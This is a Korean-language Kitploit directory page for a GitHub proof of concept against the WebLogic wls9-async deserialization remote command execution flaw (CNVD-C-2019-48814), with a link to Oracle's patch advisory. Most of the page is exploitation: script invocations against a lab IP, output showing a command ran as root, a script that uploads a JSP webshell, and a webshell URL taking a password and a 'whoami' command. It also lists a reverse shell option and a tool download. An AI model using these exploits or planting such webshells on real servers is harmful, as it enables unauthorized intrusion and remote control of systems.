Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CNVD-C-2019-48814 — WebLogic wls9-async 역직렬화 원격 명령 실행 취약점 | Kitploit
도구/GitHubGitHub/jas502n/cnvd-c-2019-48814
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjas502n/cnvd-c-2019-48814

CNVD-C-2019-48814

WebLogic wls9-async 역직렬화 원격 명령 실행 취약점

저장소 보기
2399117년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CNVD-C-2019-48814

WebLogic wls9-async 역직렬화 원격 명령 실행 취약점

weblogic용 Echo PoC

패치 업데이트:

root@kitploit:~

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

취약점 재현:

root@kitploit:~
http://10.10.20.166:7001/_async/AsyncResponseService
root@kitploit:~
curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 영상

CNVD-C-2019-48814

root@kitploit:~
python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

RMI 사용

CVE-2017-10271 패치 없음

windows-linux-webshell

root@kitploit:~
upadte: 사용자 정의 webshell 이름, windows 또는 linux에서 webshell 업로드 가능

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

리버스 셸

명령어 출력

웹셸

도구 다운로드